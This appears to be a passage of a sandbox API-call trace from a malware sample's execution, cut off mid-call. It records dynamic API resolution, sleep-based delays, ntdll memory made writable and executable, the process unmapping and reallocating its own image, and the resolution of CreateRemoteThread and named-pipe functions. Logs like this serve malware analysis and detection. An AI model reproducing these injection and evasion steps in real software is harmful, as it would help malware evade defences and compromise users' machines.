(in: hProcess=0xffffffff, lpBaseAddress=0x4001f7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001fa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.347] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0329.347] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.347] GetProcAddress (hModule=0x759c0000, lpProcName="EnumResourceTypesA") returned 0x75a50efd [0329.347] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x408bc5, lParam=0x0) [0329.347] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.347] LoadLibraryA (lpLibFileName="shell32") returned 0x76a70000 [0329.349] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.349] GetProcAddress (hModule=0x76a70000, lpProcName="Shell_NotifyIconA") returned 0x76cb8af2 [0329.350] Shell_NotifyIconA (dwMessage=0x0, lpData=0x18f370) returned 1 [0329.350] Shell_NotifyIconA (dwMessage=0x2, lpData=0x18f370) returned 1 [0329.355] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77cb0000 [0329.355] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] GetProcAddress (hModule=0x77cb0000, lpProcName="ZwSetInformationProcess") returned 0x77ccfb18 [0329.356] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] GetProcAddress (hModule=0x758c0000, lpProcName="GetDesktopWindow") returned 0x758e0a19 [0329.356] GetDesktopWindow () returned 0x10010 [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0329.356] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.356] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0329.357] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.357] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0329.357] SetLastError (dwErrCode=0x5) [0329.357] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.357] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0329.357] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.357] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0329.357] SetErrorMode (uMode=0x400) returned 0x8001 [0329.357] SetErrorMode (uMode=0x0) returned 0x400 [0329.357] SetErrorMode (uMode=0x8001) returned 0x0 [0329.357] LoadLibraryA (lpLibFileName="ntdll") returned 0x77cb0000 [0329.357] SetErrorMode (uMode=0x0) returned 0x8001 [0329.357] GetProcAddress (hModule=0x77cb0000, lpProcName="NtYieldExecution") returned 0x77ccff2c [0329.357] Sleep (dwMilliseconds=0xf) [0329.370] NtYieldExecution () returned 0x0 [0329.370] Sleep (dwMilliseconds=0xf) [0329.386] NtYieldExecution () returned 0x0 [0329.386] Sleep (dwMilliseconds=0xf) [0329.403] NtYieldExecution () returned 0x0 [0329.404] Sleep (dwMilliseconds=0xf) [0329.417] NtYieldExecution () returned 0x0 [0329.417] Sleep (dwMilliseconds=0xf) [0329.432] NtYieldExecution () returned 0x40000024 [0329.432] Sleep (dwMilliseconds=0xf) [0329.448] NtYieldExecution () returned 0x40000024 [0329.448] Sleep (dwMilliseconds=0xf) [0329.463] NtYieldExecution () returned 0x0 [0329.464] Sleep (dwMilliseconds=0xf) [0329.480] NtYieldExecution () returned 0x40000024 [0329.480] Sleep (dwMilliseconds=0xf) [0329.495] NtYieldExecution () returned 0x40000024 [0329.495] Sleep (dwMilliseconds=0xf) [0329.511] NtYieldExecution () returned 0x40000024 [0329.511] Sleep (dwMilliseconds=0xf) [0329.526] NtYieldExecution () returned 0x40000024 [0329.526] Sleep (dwMilliseconds=0xf) [0329.542] NtYieldExecution () returned 0x40000024 [0329.542] Sleep (dwMilliseconds=0xf) [0329.558] NtYieldExecution () returned 0x40000024 [0329.558] Sleep (dwMilliseconds=0xf) [0329.573] NtYieldExecution () returned 0x40000024 [0329.573] Sleep (dwMilliseconds=0xf) [0329.588] NtYieldExecution () returned 0x40000024 [0329.589] Sleep (dwMilliseconds=0xf) [0329.605] NtYieldExecution () returned 0x40000024 [0329.605] Sleep (dwMilliseconds=0xf) [0329.620] NtYieldExecution () returned 0x40000024 [0329.620] Sleep (dwMilliseconds=0xf) [0329.635] NtYieldExecution () returned 0x40000024 [0329.636] Sleep (dwMilliseconds=0xf) [0329.651] NtYieldExecution () returned 0x40000024 [0329.651] Sleep (dwMilliseconds=0xf) [0329.669] NtYieldExecution () returned 0x40000024 [0329.669] Sleep (dwMilliseconds=0xf) [0329.682] NtYieldExecution () returned 0x40000024 [0329.682] Sleep (dwMilliseconds=0xf) [0329.699] NtYieldExecution () returned 0x0 [0329.700] Sleep (dwMilliseconds=0xf) [0329.716] NtYieldExecution () returned 0x40000024 [0329.717] Sleep (dwMilliseconds=0xf) [0329.729] NtYieldExecution () returned 0x0 [0329.730] Sleep (dwMilliseconds=0xf) [0329.744] NtYieldExecution () returned 0x40000024 [0329.744] Sleep (dwMilliseconds=0xf) [0329.764] NtYieldExecution () returned 0x40000024 [0329.764] Sleep (dwMilliseconds=0xf) [0329.776] NtYieldExecution () returned 0x40000024 [0329.776] Sleep (dwMilliseconds=0xf) [0329.791] NtYieldExecution () returned 0x40000024 [0329.791] Sleep (dwMilliseconds=0xf) [0329.807] NtYieldExecution () returned 0x40000024 [0329.807] Sleep (dwMilliseconds=0xf) [0329.822] NtYieldExecution () returned 0x40000024 [0329.822] Sleep (dwMilliseconds=0xf) [0329.838] NtYieldExecution () returned 0x40000024 [0329.838] Sleep (dwMilliseconds=0xf) [0329.853] NtYieldExecution () returned 0x40000024 [0329.854] Sleep (dwMilliseconds=0x1f40) [0337.857] SetErrorMode (uMode=0x8001) returned 0x0 [0337.857] LoadLibraryA (lpLibFileName="ntdll") returned 0x77cb0000 [0337.858] SetErrorMode (uMode=0x0) returned 0x8001 [0337.858] GetProcAddress (hModule=0x77cb0000, lpProcName="NtProtectVirtualMemory") returned 0x77cd0028 [0337.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f53c*=0x77cc0000, NumberOfBytesToProtect=0x18f540, NewAccessProtection=0x40, OldAccessProtection=0x18f544 | out: BaseAddress=0x18f53c*=0x77cc0000, NumberOfBytesToProtect=0x18f540, OldAccessProtection=0x18f544*=0x20) returned 0x0 [0337.869] SetErrorMode (uMode=0x8001) returned 0x0 [0337.869] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.869] SetErrorMode (uMode=0x0) returned 0x8001 [0337.869] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileA") returned 0x759d53c6 [0337.869] SetErrorMode (uMode=0x8001) returned 0x0 [0337.869] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.869] SetErrorMode (uMode=0x0) returned 0x8001 [0337.869] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0337.869] SetErrorMode (uMode=0x8001) returned 0x0 [0337.869] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.869] SetErrorMode (uMode=0x0) returned 0x8001 [0337.869] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0337.869] SetErrorMode (uMode=0x8001) returned 0x0 [0337.869] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.869] SetErrorMode (uMode=0x0) returned 0x8001 [0337.869] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0337.869] SetErrorMode (uMode=0x8001) returned 0x0 [0337.870] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.870] SetErrorMode (uMode=0x0) returned 0x8001 [0337.870] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSize") returned 0x759d196e [0337.870] SetErrorMode (uMode=0x8001) returned 0x0 [0337.870] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.870] SetErrorMode (uMode=0x0) returned 0x8001 [0337.870] GetProcAddress (hModule=0x759c0000, lpProcName="UnmapViewOfFile") returned 0x759d1826 [0337.870] SetErrorMode (uMode=0x8001) returned 0x0 [0337.870] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.870] SetErrorMode (uMode=0x0) returned 0x8001 [0337.870] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualProtectEx") returned 0x75a545bf [0337.870] SetErrorMode (uMode=0x8001) returned 0x0 [0337.870] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.870] SetErrorMode (uMode=0x0) returned 0x8001 [0337.870] GetProcAddress (hModule=0x759c0000, lpProcName="GetLongPathNameA") returned 0x75a5437f [0337.870] SetErrorMode (uMode=0x8001) returned 0x0 [0337.870] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.870] SetErrorMode (uMode=0x0) returned 0x8001 [0337.871] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateProcess") returned 0x759ed802 [0337.871] SetErrorMode (uMode=0x8001) returned 0x0 [0337.871] LoadLibraryA (lpLibFileName="IPHlpApi") returned 0x756b0000 [0337.875] SetErrorMode (uMode=0x0) returned 0x8001 [0337.875] GetProcAddress (hModule=0x756b0000, lpProcName="GetAdaptersInfo") returned 0x756b9263 [0337.875] SetErrorMode (uMode=0x8001) returned 0x0 [0337.875] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0337.875] SetErrorMode (uMode=0x0) returned 0x8001 [0337.875] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0337.875] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0337.876] GetAdaptersInfo (in: AdapterInfo=0x240000, SizePointer=0x18f54c | out: AdapterInfo=0x240000, SizePointer=0x18f54c) returned 0x0 [0337.885] SetErrorMode (uMode=0x8001) returned 0x0 [0337.885] LoadLibraryA (lpLibFileName="shell32") returned 0x76a70000 [0337.885] SetErrorMode (uMode=0x0) returned 0x8001 [0337.885] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteA") returned 0x76cb7078 [0337.885] SetErrorMode (uMode=0x8001) returned 0x0 [0337.885] LoadLibraryA (lpLibFileName="User32") returned 0x758c0000 [0337.885] SetErrorMode (uMode=0x0) returned 0x8001 [0337.885] GetProcAddress (hModule=0x758c0000, lpProcName="EnumWindows") returned 0x758dd1cf [0337.885] EnumWindows (lpEnumFunc=0x544faa, lParam=0x18f5f0) returned 1 [0337.886] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x3650000 [0337.892] SetErrorMode (uMode=0x8001) returned 0x0 [0337.892] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0337.892] SetErrorMode (uMode=0x0) returned 0x8001 [0337.892] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0337.892] SetErrorMode (uMode=0x8001) returned 0x0 [0337.892] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0337.892] SetErrorMode (uMode=0x0) returned 0x8001 [0337.892] GetProcAddress (hModule=0x758c0000, lpProcName="EnumThreadWindows") returned 0x758e3961 [0337.892] EnumThreadWindows (dwThreadId=0x7b4, lpfn=0x5450d5, lParam=0x758d9a55) returned 0 [0337.892] DestroyWindow (hWnd=0x10160) returned 1 [0337.892] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0337.892] SendMessageA (hWnd=0x10160, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0337.892] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0337.893] SelectObject (hdc=0xd0106c6, h=0x18a002e) returned 0x120a019e [0337.893] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0337.894] SelectObject (hdc=0xd0106c6, h=0x18a002e) returned 0x18a002e [0337.894] SelectObject (hdc=0x130106c8, h=0xf3006ab) returned 0x1b00016 [0337.894] SelectObject (hdc=0x130106c8, h=0x120a019e) returned 0x18a002e [0337.894] SelectObject (hdc=0x130106c8, h=0x1900011) returned 0x1900015 [0337.894] SetBrushOrgEx (in: hdc=0x130106c8, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0337.894] UnrealizeObject (h=0x1900015) returned 1 [0337.894] SelectObject (hdc=0x130106c8, h=0x1900015) returned 0x1900011 [0337.894] SetBkMode (hdc=0x130106c8, mode=1) returned 1 [0337.894] OleTranslateColor () returned 0x0 [0337.894] SetBkColor (hdc=0x130106c8, color=0xf0f0f0) returned 0xf0f0f0 [0337.894] OleTranslateColor () returned 0x0 [0337.894] SetTextColor (hdc=0x130106c8, color=0x0) returned 0x0 [0337.894] GetROP2 (hdc=0xd0106c6) returned 13 [0337.894] SetROP2 (hdc=0x130106c8, rop2=13) returned 13 [0337.894] SelectObject (hdc=0xd0106c6, h=0x1b00016) returned 0xf3006ab [0337.894] SelectObject (hdc=0xd0106c6, h=0x18a002e) returned 0x18a002e [0337.894] SelectObject (hdc=0xd0106c6, h=0x1900015) returned 0x1900015 [0337.894] SelectPalette (hdc=0xd0106c6, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0337.894] DeleteDC (hdc=0xd0106c6) returned 1 [0337.894] SelectObject (hdc=0x130106c8, h=0x1b00016) returned 0xf3006ab [0337.894] DeleteObject (ho=0xf3006ab) returned 1 [0337.894] SelectObject (hdc=0x130106c8, h=0x1900015) returned 0x1900015 [0337.894] SelectObject (hdc=0x130106c8, h=0x1900015) returned 0x1900015 [0337.894] ReleaseDC (hWnd=0x10160, hDC=0x130106c8) returned 1 [0337.894] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0337.895] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0337.896] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0337.897] SetErrorMode (uMode=0x8001) returned 0x0 [0337.897] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.897] SetErrorMode (uMode=0x0) returned 0x8001 [0337.897] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateThread") returned 0x759d7a2f [0337.897] SetErrorMode (uMode=0x8001) returned 0x0 [0337.897] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.897] SetErrorMode (uMode=0x0) returned 0x8001 [0337.897] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0337.897] SetErrorMode (uMode=0x8001) returned 0x0 [0337.897] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.897] SetErrorMode (uMode=0x0) returned 0x8001 [0337.897] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0337.897] SetErrorMode (uMode=0x8001) returned 0x0 [0337.897] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.897] SetErrorMode (uMode=0x0) returned 0x8001 [0337.897] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0337.897] SetErrorMode (uMode=0x8001) returned 0x0 [0337.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.898] SetErrorMode (uMode=0x0) returned 0x8001 [0337.898] GetProcAddress (hModule=0x759c0000, lpProcName="GetNativeSystemInfo") returned 0x759e10b5 [0337.898] SetErrorMode (uMode=0x8001) returned 0x0 [0337.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.898] SetErrorMode (uMode=0x0) returned 0x8001 [0337.898] GetProcAddress (hModule=0x759c0000, lpProcName="CreateThread") returned 0x759d34d5 [0337.898] SetErrorMode (uMode=0x8001) returned 0x0 [0337.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.898] SetErrorMode (uMode=0x0) returned 0x8001 [0337.898] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0337.898] SetErrorMode (uMode=0x8001) returned 0x0 [0337.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.898] SetErrorMode (uMode=0x0) returned 0x8001 [0337.898] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0337.898] SetErrorMode (uMode=0x8001) returned 0x0 [0337.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.899] SetErrorMode (uMode=0x0) returned 0x8001 [0337.899] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0337.899] SetErrorMode (uMode=0x8001) returned 0x0 [0337.899] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.899] SetErrorMode (uMode=0x0) returned 0x8001 [0337.899] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0337.899] SetErrorMode (uMode=0x8001) returned 0x0 [0337.899] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.899] SetErrorMode (uMode=0x0) returned 0x8001 [0337.899] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteCriticalSection") returned 0x77ce45f5 [0337.899] SetErrorMode (uMode=0x8001) returned 0x0 [0337.899] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.899] SetErrorMode (uMode=0x0) returned 0x8001 [0337.899] GetProcAddress (hModule=0x759c0000, lpProcName="GetComputerNameW") returned 0x759ddd0e [0337.899] SetErrorMode (uMode=0x8001) returned 0x0 [0337.899] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.899] SetErrorMode (uMode=0x0) returned 0x8001 [0337.900] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0337.900] SetErrorMode (uMode=0x8001) returned 0x0 [0337.900] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.900] SetErrorMode (uMode=0x0) returned 0x8001 [0337.900] GetProcAddress (hModule=0x759c0000, lpProcName="SystemTimeToFileTime") returned 0x759d5a7e [0337.900] SetErrorMode (uMode=0x8001) returned 0x0 [0337.900] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.900] SetErrorMode (uMode=0x0) returned 0x8001 [0337.900] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalMemoryStatusEx") returned 0x759fd4c4 [0337.900] SetErrorMode (uMode=0x8001) returned 0x0 [0337.900] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.900] SetErrorMode (uMode=0x0) returned 0x8001 [0337.900] GetProcAddress (hModule=0x759c0000, lpProcName="CreateProcessW") returned 0x759d103d [0337.900] SetErrorMode (uMode=0x8001) returned 0x0 [0337.900] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.900] SetErrorMode (uMode=0x0) returned 0x8001 [0337.900] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0337.901] SetErrorMode (uMode=0x8001) returned 0x0 [0337.901] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.901] SetErrorMode (uMode=0x0) returned 0x8001 [0337.901] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedIncrement") returned 0x759d1400 [0337.901] SetErrorMode (uMode=0x8001) returned 0x0 [0337.901] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.901] SetErrorMode (uMode=0x0) returned 0x8001 [0337.901] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0337.901] SetErrorMode (uMode=0x8001) returned 0x0 [0337.901] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.901] SetErrorMode (uMode=0x0) returned 0x8001 [0337.901] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFreeEx") returned 0x759ed9c8 [0337.901] SetErrorMode (uMode=0x8001) returned 0x0 [0337.901] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.901] SetErrorMode (uMode=0x0) returned 0x8001 [0337.901] GetProcAddress (hModule=0x759c0000, lpProcName="IsBadReadPtr") returned 0x759fd075 [0337.901] SetErrorMode (uMode=0x8001) returned 0x0 [0337.901] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.902] SetErrorMode (uMode=0x0) returned 0x8001 [0337.902] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0337.902] SetErrorMode (uMode=0x8001) returned 0x0 [0337.902] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.902] SetErrorMode (uMode=0x0) returned 0x8001 [0337.902] GetProcAddress (hModule=0x759c0000, lpProcName="OpenMutexW") returned 0x759d5151 [0337.902] SetErrorMode (uMode=0x8001) returned 0x0 [0337.902] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.902] SetErrorMode (uMode=0x0) returned 0x8001 [0337.902] GetProcAddress (hModule=0x759c0000, lpProcName="SetEndOfFile") returned 0x759ece2e [0337.902] SetErrorMode (uMode=0x8001) returned 0x0 [0337.902] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.902] SetErrorMode (uMode=0x0) returned 0x8001 [0337.902] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentThread") returned 0x759d17ec [0337.902] SetErrorMode (uMode=0x8001) returned 0x0 [0337.902] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.902] SetErrorMode (uMode=0x0) returned 0x8001 [0337.903] GetProcAddress (hModule=0x759c0000, lpProcName="FlushFileBuffers") returned 0x759d469b [0337.903] SetErrorMode (uMode=0x8001) returned 0x0 [0337.903] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.903] SetErrorMode (uMode=0x0) returned 0x8001 [0337.903] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x77d25f41 [0337.903] SetErrorMode (uMode=0x8001) returned 0x0 [0337.903] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.908] SetErrorMode (uMode=0x0) returned 0x8001 [0337.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcess") returned 0x759d1809 [0337.908] SetErrorMode (uMode=0x8001) returned 0x0 [0337.908] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.908] SetErrorMode (uMode=0x0) returned 0x8001 [0337.908] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0337.909] SetErrorMode (uMode=0x8001) returned 0x0 [0337.909] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.909] SetErrorMode (uMode=0x0) returned 0x8001 [0337.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0337.909] SetErrorMode (uMode=0x8001) returned 0x0 [0337.909] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.909] SetErrorMode (uMode=0x0) returned 0x8001 [0337.909] GetProcAddress (hModule=0x759c0000, lpProcName="DuplicateHandle") returned 0x759d1886 [0337.909] SetErrorMode (uMode=0x8001) returned 0x0 [0337.909] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.909] SetErrorMode (uMode=0x0) returned 0x8001 [0337.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleA") returned 0x759d1245 [0337.909] SetErrorMode (uMode=0x8001) returned 0x0 [0337.909] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.909] SetErrorMode (uMode=0x0) returned 0x8001 [0337.909] GetProcAddress (hModule=0x759c0000, lpProcName="AddVectoredExceptionHandler") returned 0x77d2742b [0337.909] SetErrorMode (uMode=0x8001) returned 0x0 [0337.909] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.910] SetErrorMode (uMode=0x0) returned 0x8001 [0337.910] GetProcAddress (hModule=0x759c0000, lpProcName="ExitProcess") returned 0x759d7a10 [0337.910] SetErrorMode (uMode=0x8001) returned 0x0 [0337.910] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.910] SetErrorMode (uMode=0x0) returned 0x8001 [0337.910] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcessId") returned 0x759d11f8 [0337.910] SetErrorMode (uMode=0x8001) returned 0x0 [0337.910] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.910] SetErrorMode (uMode=0x0) returned 0x8001 [0337.910] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileW") returned 0x759f830d [0337.910] SetErrorMode (uMode=0x8001) returned 0x0 [0337.910] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.910] SetErrorMode (uMode=0x0) returned 0x8001 [0337.910] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0337.910] SetErrorMode (uMode=0x8001) returned 0x0 [0337.910] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.910] SetErrorMode (uMode=0x0) returned 0x8001 [0337.911] GetProcAddress (hModule=0x759c0000, lpProcName="IsWow64Process") returned 0x759d195e [0337.911] SetErrorMode (uMode=0x8001) returned 0x0 [0337.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.911] SetErrorMode (uMode=0x0) returned 0x8001 [0337.911] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstChangeNotificationW") returned 0x759ed851 [0337.911] SetErrorMode (uMode=0x8001) returned 0x0 [0337.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.911] SetErrorMode (uMode=0x0) returned 0x8001 [0337.911] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextChangeNotification") returned 0x759f5c1e [0337.911] SetErrorMode (uMode=0x8001) returned 0x0 [0337.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.911] SetErrorMode (uMode=0x0) returned 0x8001 [0337.911] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessInJob") returned 0x759fc7ea [0337.911] SetErrorMode (uMode=0x8001) returned 0x0 [0337.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.911] SetErrorMode (uMode=0x0) returned 0x8001 [0337.911] GetProcAddress (hModule=0x759c0000, lpProcName="CreateRemoteThread") returned 0x75a5416b [0337.911] SetErrorMode (uMode=0x8001) returned 0x0 [0337.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.912] SetErrorMode (uMode=0x0) returned 0x8001 [0337.912] GetProcAddress (hModule=0x759c0000, lpProcName="CreateNamedPipeW") returned 0x75a5414b [0337.912] SetErrorMode (uMode=0x8001) returned 0x0 [0337.912] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.912] SetErrorMode (uMode=0x0) returned 0x8001 [0337.912] GetProcAddress (hModule=0x759c0000, lpProcName="DisconnectNamedPipe") returned 0x75a541df [0337.912] SetErrorMode (uMode=0x8001) returned 0x0 [0337.912] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.912] SetErrorMode (uMode=0x0) returned 0x8001 [0337.912] GetProcAddress (hModule=0x759c0000, lpProcName="ConnectNamedPipe") returned 